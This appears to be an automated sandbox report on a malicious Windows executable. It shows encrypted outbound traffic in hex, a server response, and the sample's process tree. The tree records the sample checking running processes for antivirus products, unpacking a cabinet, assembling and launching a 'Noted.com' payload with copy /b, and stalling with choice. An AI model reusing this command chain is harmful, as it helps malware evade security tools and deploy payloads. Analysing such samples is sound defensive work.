2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: d3 52 32 12 00 9d 8f 5d f9 82 3f b0 63 03 04 78 65 4d 52 ff 38 10 f2 0e 91 ca d0 92 60 86 11 6a 25 b3 9f d7 e1 65 11 0b 83 b2 9d 34 81 8d 4e 61 dc 35 95 84 e0 d5 bb 2d 36 43 91 e8 a8 99 5d 0a 6d aa 55 87 7b 3d 3c d8 d3 4a 81 c8 e7 f8 cb 56 e9 b1 dd 62 0e 22 c0 c6 35 b3 7d 81 fd b7 54 e2 f7 16 c3 f0 96 45 c6 ca a8 28 ce 9f eb b0 8e 60 29 2c cc 6a 39 34 55 d0 7f 0e ac fa 2e 62 ca b7 53 0e 2a dd f7 22 06 b7 47 7d ba fc ab fe 08 d0 9d 8d 7f 4a 5d df 34 96 7b ff a1 63 4f fc ab af a5 37 86 86 58 3f 86 57 94 be a7 87 f8 22 2e 7d af aa 27 9a bb d5 98 2c 7a 34 4d d0 45 c3 12 39 8c 3f 67 58 88 90 24 e2 c7 87 6b 98 8e 1b 8a 4b 55 1b 9f cb b0 3d ae bd 5a 3b 88 f2 ac f1 c8 e5 38 4e 5f 4c e4 38 a9 e3 e3 49 d7 36 8a 49 24 05 c7 e6 28 d4 56 09 be 0d 9d 7f d4 4d a7 b5 9e
Data Ascii: R2]?cxeMR8`j%e4Na5-6C]mU{=<JVb"5}TE(`),j94U.bS*"G}J]4{cO7X?W".}',z4ME9?gX$kKU=Z;8N_L8I6I$(VM
2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: 24 c0 eb 5d 6f f1 d4 54 a1 73 b4 74 30 0c ce 07 f4 ae 9b c9 29 1d ed cb 82 80 38 e8 c5 be 99 b7 2f 36 4e d1 7b 91 8f e6 be 14 6f 80 d2 de 99 ff 91 8f b0 55 c0 7e 2d 11 81 07 b7 12 a9 c9 3e 34 83 95 76 03 94 24 fe 6a 26 0a 6f 3b 14 7e 01 5f 57 ea 5a 8e 59 3b 48 56 f1 40 fe dc 3f 35 89 13 60 be 98 4d ae f3 17 1f 3b a5 10 59 66 59 2c 9d 92 8c 1c 47 31 d9 17 5b d5 ee 2f 8a 09 62 24 5e ba e3 3b 44 da 88 8c ee 13 ee d5 e9 f3 b9 5a 40 1d 9c 4d 75 cd 93 69 58 7c 65 9b 78 e3 4f eb 70 b7 f8 0c fe bc f7 55 95 0c dd 90 c8 df f1 3d 97 69 99 e5 68 7e d1 8b 0f 6f 6e 5d 6c 43 36 c8 2d 84 5a d4 b8 dd fb eb 20 fd c5 3b d1 22 9e 6f c9 3c 2d 36 5c 00 21 8b c2 30 eb 4d ee 99 4f 36 d5 10 33 42 ca 94 fc 07 e5 f6 5e 84 f3 74 97 4f 93 63 18 e4 2b 85 3b d0 f1 67 2d 95 6c a9 88 b9
Data Ascii: $]oTst0)8/6N{oU~->4v$j&o;~_WZY;HV@?5`M;YfY,G1[/b$^;DZ@MuiX|exOpU=ih~on]lC6-Z ;"o<-6\!0MO63B^tOc+;g-l
2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: 9f be 88 8f e9 74 2a 63 f9 09 11 fb 23 92 b5 dc e4 61 25 29 b7 31 ee 41 ed 1c 75 53 c3 91 31 00 6e 8d 2a a6 2b a6 0d f1 21 46 20 ab 50 0b 44 f3 02 25 40 da 6a c9 a6 6e 25 9a 8b 00 81 52 6e 89 7a 6c 94 1e 4c 95 f4 a4 fe f6 6d 6b 46 00 1a 48 fa 97 16 d2 f6 84 b6 0b cc 23 ac e9 5f a9 79 af 7f a4 e6 3d 00 fc ee eb 27 eb 06 86 2a 4f d1 25 c2 14 80 9e a2 de 0b a5 77 1e e9 6a 56 05 ba c8 ba 96 04 f9 16 9d f2 16 1b d2 e1 07 84 8e ef 68 10 de 55 88 2e 3e f1 4a 00 57 f2 09 f5 d1 fc 48 d1 dc 9b 1b 9f a0 c1 db 04 42 8d 11 92 84 b5 84 c1 aa 2c 47 50 14 08 7d 81 fe 67 e9 75 ab 81 22 b2 d7 1b 88 71 ca 61 bb ed e0 14 1e 11 76 aa fb 45 78 69 d5 fb 45 28 64 f2 3b 0f 21 a6 1f 20 93 11 44 e8 c9 9f 8f 85 27 99 67 2d 12 75 b2 35 fc 4e ad c5 5e db fa a3 87 2e d0 09 9a 7d ac 96
Data Ascii: t*c#a%)1AuS1n*+!F PD%@jn%RnzlLmkFH#_y='*O%wjVhU.>JWHB,GP}gu"qavExiE(d;! D'g-u5N^.}
2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: c8 a2 c7 4e 76 72 7f 0f 50 be cc cd a5 16 29 e1 02 85 f5 e6 bb 1c e7 1f 31 18 3d c1 73 0b 22 94 e3 77 ed 9a aa df af 3a d7 18 c7 81 9f 71 f5 2a 87 e8 c4 fe 70 10 72 76 18 75 65 59 72 de 2a d6 a8 1d 21 f0 78 e6 da e7 75 d6 df 41 78 a4 f4 77 47 50 6d dd b0 ce fa 52 5f 00 da 77 6b bc ee ac 5b 92 0d 33 7d a6 aa 73 5f 4c b0 e7 66 c7 a7 08 d5 5d b4 2f 79 0b b3 06 15 0d 56 bd 61 5a ef ab 26 4e 90 fb 94 65 4e 10 6c cf e6 4b 9e c1 83 97 c8 27 f2 6e d0 ca 3b 4a 0d e4 dc 1f e7 ea b9 9f be 90 76 49 6c 66 a0 c2 40 df 9b 49 5e 96 a4 72 c6 cc 22 a8 a4 ad 8a a0 b6 b9 b4 8d 2f 59 9c fe cf db 8d d5 ef 29 fd d7 2b 0f 55 7e 90 18 0c 6b c4 b3 87 7a 3e 7f dd 4a ac a9 92 cc bb dd e2 02 ba 7f ac 90 36 0b 58 73 29 35 d9 61 e8 1c c3 ac 95 7e 75 c0 f4 d3 c5 2e 01 e6 b6 f9 24 04 3e
Data Ascii: NvrP)1=s"w:q*prvueYr*!xuAxwGPmR_wk[3}s_Lf]/yVaZ&NeNlK'n;JvIlf@I^r"/Y)+U~kz>J6Xs)5a~u.$>
2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: 5c 91 09 a4 7e f6 d4 ba 93 d1 ae d1 f0 70 71 eb d6 2d 23 54 2b ce fa fd 1f 57 d9 95 1f 3b 85 74 c1 77 5d 5d c1 3f c2 84 17 cc 0c 58 16 a8 7d 03 91 62 b3 c2 d4 cb 01 1c a6 b4 36 fd ef 2d a5 af aa b7 56 a3 15 19 f7 36 49 66 d3 a9 ef 49 a2 1e 7b 47 68 07 c6 34 98 a3 ed b3 2b 8f ff 1a 5f b4 06 0f d4 76 98 97 f1 4f 8a c0 f2 13 c6 13 e5 4b 3b 37 8c 93 b9 11 4e 43 fa 0e a6 9c ba c8 92 f5 f0 0f 8b f5 6f d8 35 5e 5b ac 9a 8f b6 bf 73 17 3c 15 73 a2 9d 19 37 58 c6 b7 c2 ea 7a d9 59 c2 bb 95 67 87 e6 1c 5d 44 56 2c d6 d9 73 ef 0d 71 68 f4 5c 0b 7f df 5e 30 77 b4 2e 9a 73 fd 95 b5 20 21 8c 0a fa 3e 09 9f 57 88 54 c7 65 24 e2 5e 87 60 b4 af 96 0b a1 df 2b b8 30 bb 4a 20 d6 14 06 27 a3 d2 9c 28 58 32 24 4b 21 e4 35 55 1e 2c 99 2a 47 09 7e 91 a6 a6 30 7c d7 d9 f4 ab 49
Data Ascii: \~pq-#T+W;tw]]?X}b6-V6IfI{Gh4+_vOK;7NCo5^[s<s7XzYg]DV,sqh\^0w.s !>WTe$^`+0J '(X2$K!5U,*G~0|I
2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: 26 37 99 75 60 78 68 1e 73 2d 73 31 a1 3f 1a 5f a2 2c 7d 9d a2 b0 ca 5d 79 9c f6 b6 07 e5 c0 fb 8c 02 5f 96 73 71 50 6e e9 eb 44 20 31 ad be 34 71 b4 f7 cb ee 0c 7d 78 14 cf 50 9a da 12 be 1e 36 d2 e3 87 d5 1e af 0d 86 06 7c 07 07 0a fd 1b 0e a8 f8 7d b0 f0 8b 2d ad 15 92 fa fd 99 6c 4c cd eb ff db e8 a2 20 6c 40 3c 4d fe 5b b2 30 87 a7 0a 42 45 c1 d4 25 e2 35 d5 02 05 5c 91 ce 15 dd 17 07 46 b9 ba d5 14 47 93 63 95 f1 0f f3 9a 06 d8 fa 41 52 4c d9 5b af f9 c2 18 f4 a7 ae 96 9a 57 78 e6 f1 d1 ea 13 3e 14 84 16 a4 bf df 07 d3 11 00 37 6e 1c 9c 0d 3f a6 04 02 66 c5 d3 fe 9b cd 75 63 2f 74 7f 06 a4 95 73 5f fc 49 fe 73 49 b4 1c b2 ff e7 60 5b 7e 71 03 b1 db 7e 08 19 90 cc bc 0c 44 24 53 48 d5 6c 4d f0 04 55 fa 02 1d 17 c4 b1 96 80 aa 78 39 da d4 3a f2 29 0b
Data Ascii: &7u`xhs-s1?_,}]y_sqPnD 14q}xP6|}-lL l@<M[0BE%5\FGcARL[Wx>7n?fuc/ts_IsI`[~q~D$SHlMUx9:)
2024-12-28 08:13:39 UTC | 15331 | OUT | Data Raw: de 84 22 c6 e6 91 ac 80 18 c3 3e 18 df 06 01 73 c5 74 f1 e2 83 af e0 36 09 90 3c 71 78 5c 1f d0 e8 b9 34 51 8a f7 a7 d8 ac 2e 93 e0 8f 2e 77 ae c1 a3 e1 be fd ff a1 9c 25 70 10 31 80 a1 8e 7c c4 77 0d c2 5c 34 b9 23 f2 40 2f 3f 5d c3 c4 43 b9 62 15 ae 0a 5d eb 90 fd 32 d2 54 63 db b0 3d 81 9c 91 3c aa 4f 4e 4e f0 1f ce 87 6d 35 36 30 ad 01 39 a1 ce 8a 1d 73 a4 61 b3 e7 35 c1 d3 ce 34 52 c7 ee 07 0d e3 ec f2 7d 94 2a 70 2e e9 67 9a 5b fa 08 32 6c 64 97 71 d9 ce 28 89 99 57 9b b3 ba c7 a5 0f 44 9e 38 92 ba 01 61 73 75 7e 0b e2 d4 b4 57 26 e5 a0 8b 2a de ad 3e ef 2a b2 5c e0 b0 1a 7e 1e 40 ed 03 ac eb 2d 25 54 b6 a5 a8 be 52 6a e0 77 df 5a 2d 60 b0 f4 96 bd 3c 3d 7d c7 a1 d6 b9 6e ac 5b f4 a9 32 99 b6 8a c8 4a 29 a9 2a 54 c8 f2 a1 ad c8 b7 f5 cf c6 8f 9c 11
Data Ascii: ">st6<qx\4Q..w%p1|w\4#@/?]Cb]2Tc=<ONNm5609sa54R}*p.g[2ldq(WD8asu~W&*>*\~@-%TRjwZ-`<=}n[2J)*T
2024-12-28 08:13:41 UTC | 1143 | IN | HTTP/1.1 200 OK
                                      Date: Sat, 28 Dec 2024 08:13:41 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Set-Cookie: PHPSESSID=qh4bks215hb3s4ankl2dapmgrp; expires=Wed, 23 Apr 2025 02:00:20 GMT; Max-Age=9999999; path=/
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 1; mode=block
                                      cf-cache-status: DYNAMIC
                                      vary: accept-encoding
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0z8dWUIZvt%2F4I041lRdAOdVW%2F48PxXHLhUh2RIAgHrQ6AB6qlbEGEMyEOKpYRauDaBDn8JRpJEZSu8cyzJa6qowmaDCS%2FtmZGoqoJXG%2ByH%2B%2FmEDdeqkJ28HzJ1CjilUxarf3KA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8f9017a0bbc98c0f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1834&rtt_var=726&sent=334&recv=602&lost=0&retrans=0&sent_bytes=2840&recv_bytes=577446&delivery_rate=1467336&cwnd=223&unsent_bytes=0&cid=7eea0ca466e6d677&ts=2475&x=0"



                                      Target ID:0
                                      Start time:03:12:52
                                      Start date:28/12/2024
                                      Path:C:\Users\user\Desktop\BagsThroat.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\BagsThroat.exe"
                                      Imagebase:0x400000
                                      File size:1'112'940 bytes
                                      MD5 hash:3B819D687B2BDE89ADE8EB1AEB4C6C5F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:03:12:53
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\cmd.exe" /c move Subjects Subjects.cmd & Subjects.cmd
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:03:12:53
                                      Start date:28/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:03:12:55
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0xb60000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:03:12:55
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /I "opssvc wrsa"
                                      Imagebase:0xde0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                      Wow64 process (32bit):true
                                      Commandline:tasklist
                                      Imagebase:0xb60000
                                      File size:79'360 bytes
                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                      Imagebase:0xde0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c md 441412
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                      Wow64 process (32bit):true
                                      Commandline:extrac32 /Y /E Discovered
                                      Imagebase:0xfc0000
                                      File size:29'184 bytes
                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:10
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\findstr.exe
                                      Wow64 process (32bit):true
                                      Commandline:findstr /V "Detailed" Eat
                                      Imagebase:0xde0000
                                      File size:29'696 bytes
                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:11
                                      Start time:03:12:56
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c copy /b 441412\Noted.com + Button + Pledge + Ve + Michael + Barely + Managers + Boolean + Speeches + Heights + Tim 441412\Noted.com
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:12
                                      Start time:03:12:57
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:cmd /c copy /b ..\Portrait + ..\Colored + ..\Classic + ..\Overseas + ..\Theaters + ..\Plays + ..\Continued S
                                      Imagebase:0x790000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:03:12:57
                                      Start date:28/12/2024
                                      Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\441412\Noted.com
                                      Wow64 process (32bit):true
                                      Commandline:Noted.com S
                                      Imagebase:0x8b0000
                                      File size:947'288 bytes
                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      Has exited:true

                                      Target ID:14
                                      Start time:03:12:57
                                      Start date:28/12/2024
                                      Path:C:\Windows\SysWOW64\choice.exe
                                      Wow64 process (32bit):true
                                      Commandline:choice /d y /t 5
                                      Imagebase:0xb50000
                                      File size:28'160 bytes
                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:18.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:20.9%
                                        Total number of Nodes:1481
                                        Total number of Limit Nodes:24
execution_graph: node and edge data of the interactive call graph (function addresses with their API call counts and call targets); the graph is not reproducible as text.
4434->4435 4436 401c99 4434->4436 4435->4434 4435->4436 4437 4027e3 4438 4027e9 4437->4438 4439 4027f2 4438->4439 4440 402836 4438->4440 4453 401553 4439->4453 4441 40145c 18 API calls 4440->4441 4443 40283d 4441->4443 4445 4062cf 11 API calls 4443->4445 4444 4027f9 4446 40145c 18 API calls 4444->4446 4450 401a13 4444->4450 4447 40284d 4445->4447 4448 40280a RegDeleteValueW 4446->4448 4457 40149d RegOpenKeyExW 4447->4457 4449 4062cf 11 API calls 4448->4449 4452 40282a RegCloseKey 4449->4452 4452->4450 4454 401563 4453->4454 4455 40145c 18 API calls 4454->4455 4456 401589 RegOpenKeyExW 4455->4456 4456->4444 4460 4014c9 4457->4460 4465 401515 4457->4465 4458 4014ef RegEnumKeyW 4459 401501 RegCloseKey 4458->4459 4458->4460 4462 406328 3 API calls 4459->4462 4460->4458 4460->4459 4461 401526 RegCloseKey 4460->4461 4463 40149d 3 API calls 4460->4463 4461->4465 4464 401511 4462->4464 4463->4460 4464->4465 4466 401541 RegDeleteKeyW 4464->4466 4465->4450 4466->4465 4467 4040e4 4468 4040ff 4467->4468 4474 40422d 4467->4474 4470 40413a 4468->4470 4498 403ff6 WideCharToMultiByte 4468->4498 4469 404298 4471 40436a 4469->4471 4472 4042a2 GetDlgItem 4469->4472 4478 403d6b 19 API calls 4470->4478 4479 403df6 8 API calls 4471->4479 4475 40432b 4472->4475 4476 4042bc 4472->4476 4474->4469 4474->4471 4477 404267 GetDlgItem SendMessageW 4474->4477 4475->4471 4480 40433d 4475->4480 4476->4475 4484 4042e2 6 API calls 4476->4484 4503 403db1 KiUserCallbackDispatcher 4477->4503 4482 40417a 4478->4482 4483 404365 4479->4483 4485 404353 4480->4485 4486 404343 SendMessageW 4480->4486 4488 403d6b 19 API calls 4482->4488 4484->4475 4485->4483 4489 404359 SendMessageW 4485->4489 4486->4485 4487 404293 4490 403d8d SendMessageW 4487->4490 4491 404187 CheckDlgButton 4488->4491 4489->4483 4490->4469 4501 403db1 KiUserCallbackDispatcher 4491->4501 4493 4041a5 GetDlgItem 4502 403dc4 SendMessageW 4493->4502 4495 4041bb SendMessageW 4496 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW 
SendMessageW 4495->4496 4497 4041d8 GetSysColor 4495->4497 4496->4483 4497->4496 4499 404033 4498->4499 4500 404015 GlobalAlloc WideCharToMultiByte 4498->4500 4499->4470 4500->4499 4501->4493 4502->4495 4503->4487 4504 402ae4 4505 402aeb 4504->4505 4506 4030e3 4504->4506 4507 402af2 CloseHandle 4505->4507 4507->4506 4508 402065 4509 401446 18 API calls 4508->4509 4510 40206d 4509->4510 4511 401446 18 API calls 4510->4511 4512 402076 GetDlgItem 4511->4512 4513 4030dc 4512->4513 4514 4030e3 4513->4514 4516 405f7d wsprintfW 4513->4516 4516->4514 4517 402665 4518 40145c 18 API calls 4517->4518 4519 40266b 4518->4519 4520 40145c 18 API calls 4519->4520 4521 402674 4520->4521 4522 40145c 18 API calls 4521->4522 4523 40267d 4522->4523 4524 4062cf 11 API calls 4523->4524 4525 40268c 4524->4525 4526 406301 2 API calls 4525->4526 4527 402695 4526->4527 4528 4026a6 lstrlenW lstrlenW 4527->4528 4530 404f9e 25 API calls 4527->4530 4532 4030e3 4527->4532 4529 404f9e 25 API calls 4528->4529 4531 4026e8 SHFileOperationW 4529->4531 4530->4527 4531->4527 4531->4532 4533 401c69 4534 40145c 18 API calls 4533->4534 4535 401c70 4534->4535 4536 4062cf 11 API calls 4535->4536 4537 401c80 4536->4537 4538 405ccc MessageBoxIndirectW 4537->4538 4539 401a13 4538->4539 4540 402f6e 4541 402f72 4540->4541 4542 402fae 4540->4542 4544 4062cf 11 API calls 4541->4544 4543 40145c 18 API calls 4542->4543 4550 402f9d 4543->4550 4545 402f7d 4544->4545 4546 4062cf 11 API calls 4545->4546 4547 402f90 4546->4547 4548 402fa2 4547->4548 4549 402f98 4547->4549 4552 406113 9 API calls 4548->4552 4551 403ea0 5 API calls 4549->4551 4551->4550 4552->4550 4553 4023f0 4554 402403 4553->4554 4555 4024da 4553->4555 4556 40145c 18 API calls 4554->4556 4557 404f9e 25 API calls 4555->4557 4558 40240a 4556->4558 4561 4024f1 4557->4561 4559 40145c 18 API calls 4558->4559 4560 402413 4559->4560 4562 402429 LoadLibraryExW 4560->4562 4563 40241b GetModuleHandleW 4560->4563 4564 4024ce 4562->4564 4565 40243e 4562->4565 
4563->4562 4563->4565 4567 404f9e 25 API calls 4564->4567 4577 406391 GlobalAlloc WideCharToMultiByte 4565->4577 4567->4555 4568 402449 4569 40248c 4568->4569 4570 40244f 4568->4570 4571 404f9e 25 API calls 4569->4571 4572 401435 25 API calls 4570->4572 4575 40245f 4570->4575 4573 402496 4571->4573 4572->4575 4574 4062cf 11 API calls 4573->4574 4574->4575 4575->4561 4576 4024c0 FreeLibrary 4575->4576 4576->4561 4578 4063c9 GlobalFree 4577->4578 4579 4063bc GetProcAddress 4577->4579 4578->4568 4579->4578 3416 402175 3426 401446 3416->3426 3418 40217c 3419 401446 18 API calls 3418->3419 3420 402186 3419->3420 3421 402197 3420->3421 3424 4062cf 11 API calls 3420->3424 3422 4021aa EnableWindow 3421->3422 3423 40219f ShowWindow 3421->3423 3425 4030e3 3422->3425 3423->3425 3424->3421 3427 406831 18 API calls 3426->3427 3428 401455 3427->3428 3428->3418 4580 4048f8 4581 404906 4580->4581 4582 40491d 4580->4582 4583 40490c 4581->4583 4598 404986 4581->4598 4584 40492b IsWindowVisible 4582->4584 4590 404942 4582->4590 4585 403ddb SendMessageW 4583->4585 4587 404938 4584->4587 4584->4598 4588 404916 4585->4588 4586 40498c CallWindowProcW 4586->4588 4599 40487a SendMessageW 4587->4599 4590->4586 4604 406035 lstrcpynW 4590->4604 4592 404971 4605 405f7d wsprintfW 4592->4605 4594 404978 4595 40141d 80 API calls 4594->4595 4596 40497f 4595->4596 4606 406035 lstrcpynW 4596->4606 4598->4586 4600 4048d7 SendMessageW 4599->4600 4601 40489d GetMessagePos ScreenToClient SendMessageW 4599->4601 4603 4048cf 4600->4603 4602 4048d4 4601->4602 4601->4603 4602->4600 4603->4590 4604->4592 4605->4594 4606->4598 3721 4050f9 3722 4052c1 3721->3722 3723 40511a GetDlgItem GetDlgItem GetDlgItem 3721->3723 3724 4052f2 3722->3724 3725 4052ca GetDlgItem CreateThread CloseHandle 3722->3725 3770 403dc4 SendMessageW 3723->3770 3727 405320 3724->3727 3729 405342 3724->3729 3730 40530c ShowWindow ShowWindow 3724->3730 3725->3724 3773 405073 OleInitialize 3725->3773 3731 40537e 3727->3731 3733 405331 
3727->3733 3734 405357 ShowWindow 3727->3734 3728 40518e 3740 406831 18 API calls 3728->3740 3735 403df6 8 API calls 3729->3735 3772 403dc4 SendMessageW 3730->3772 3731->3729 3736 405389 SendMessageW 3731->3736 3737 403d44 SendMessageW 3733->3737 3738 405377 3734->3738 3739 405369 3734->3739 3745 4052ba 3735->3745 3744 4053a2 CreatePopupMenu 3736->3744 3736->3745 3737->3729 3743 403d44 SendMessageW 3738->3743 3741 404f9e 25 API calls 3739->3741 3742 4051ad 3740->3742 3741->3738 3746 4062cf 11 API calls 3742->3746 3743->3731 3747 406831 18 API calls 3744->3747 3748 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3746->3748 3749 4053b2 AppendMenuW 3747->3749 3750 405203 SendMessageW SendMessageW 3748->3750 3751 40521f 3748->3751 3752 4053c5 GetWindowRect 3749->3752 3753 4053d8 3749->3753 3750->3751 3754 405232 3751->3754 3755 405224 SendMessageW 3751->3755 3756 4053df TrackPopupMenu 3752->3756 3753->3756 3757 403d6b 19 API calls 3754->3757 3755->3754 3756->3745 3758 4053fd 3756->3758 3759 405242 3757->3759 3760 405419 SendMessageW 3758->3760 3761 40524b ShowWindow 3759->3761 3762 40527f GetDlgItem SendMessageW 3759->3762 3760->3760 3763 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3760->3763 3764 405261 ShowWindow 3761->3764 3765 40526e 3761->3765 3762->3745 3766 4052a2 SendMessageW SendMessageW 3762->3766 3767 40545b SendMessageW 3763->3767 3764->3765 3771 403dc4 SendMessageW 3765->3771 3766->3745 3767->3767 3768 405486 GlobalUnlock SetClipboardData CloseClipboard 3767->3768 3768->3745 3770->3728 3771->3762 3772->3727 3774 403ddb SendMessageW 3773->3774 3778 405096 3774->3778 3775 403ddb SendMessageW 3776 4050d1 OleUninitialize 3775->3776 3777 4062cf 11 API calls 3777->3778 3778->3777 3779 40139d 80 API calls 3778->3779 3780 4050c1 3778->3780 3779->3778 3780->3775 4607 4020f9 GetDC GetDeviceCaps 4608 401446 18 API calls 4607->4608 4609 402116 MulDiv 4608->4609 4610 401446 18 API calls 4609->4610 4611 40212c 4610->4611 4612 406831 18 API 
calls 4611->4612 4613 402165 CreateFontIndirectW 4612->4613 4614 4030dc 4613->4614 4615 4030e3 4614->4615 4617 405f7d wsprintfW 4614->4617 4617->4615 4618 4024fb 4619 40145c 18 API calls 4618->4619 4620 402502 4619->4620 4621 40145c 18 API calls 4620->4621 4622 40250c 4621->4622 4623 40145c 18 API calls 4622->4623 4624 402515 4623->4624 4625 40145c 18 API calls 4624->4625 4626 40251f 4625->4626 4627 40145c 18 API calls 4626->4627 4628 402529 4627->4628 4629 40253d 4628->4629 4630 40145c 18 API calls 4628->4630 4631 4062cf 11 API calls 4629->4631 4630->4629 4632 40256a CoCreateInstance 4631->4632 4633 40258c 4632->4633 4634 4026fc 4636 402708 4634->4636 4637 401ee4 4634->4637 4635 406831 18 API calls 4635->4637 4637->4634 4637->4635 3781 4019fd 3782 40145c 18 API calls 3781->3782 3783 401a04 3782->3783 3786 405eab 3783->3786 3787 405eb8 GetTickCount GetTempFileNameW 3786->3787 3788 401a0b 3787->3788 3789 405eee 3787->3789 3789->3787 3789->3788 4638 4022fd 4639 40145c 18 API calls 4638->4639 4640 402304 GetFileVersionInfoSizeW 4639->4640 4641 4030e3 4640->4641 4642 40232b GlobalAlloc 4640->4642 4642->4641 4643 40233f GetFileVersionInfoW 4642->4643 4644 402350 VerQueryValueW 4643->4644 4645 402381 GlobalFree 4643->4645 4644->4645 4646 402369 4644->4646 4645->4641 4651 405f7d wsprintfW 4646->4651 4649 402375 4652 405f7d wsprintfW 4649->4652 4651->4649 4652->4645 4653 402afd 4654 40145c 18 API calls 4653->4654 4655 402b04 4654->4655 4660 405e7c GetFileAttributesW CreateFileW 4655->4660 4657 402b10 4658 4030e3 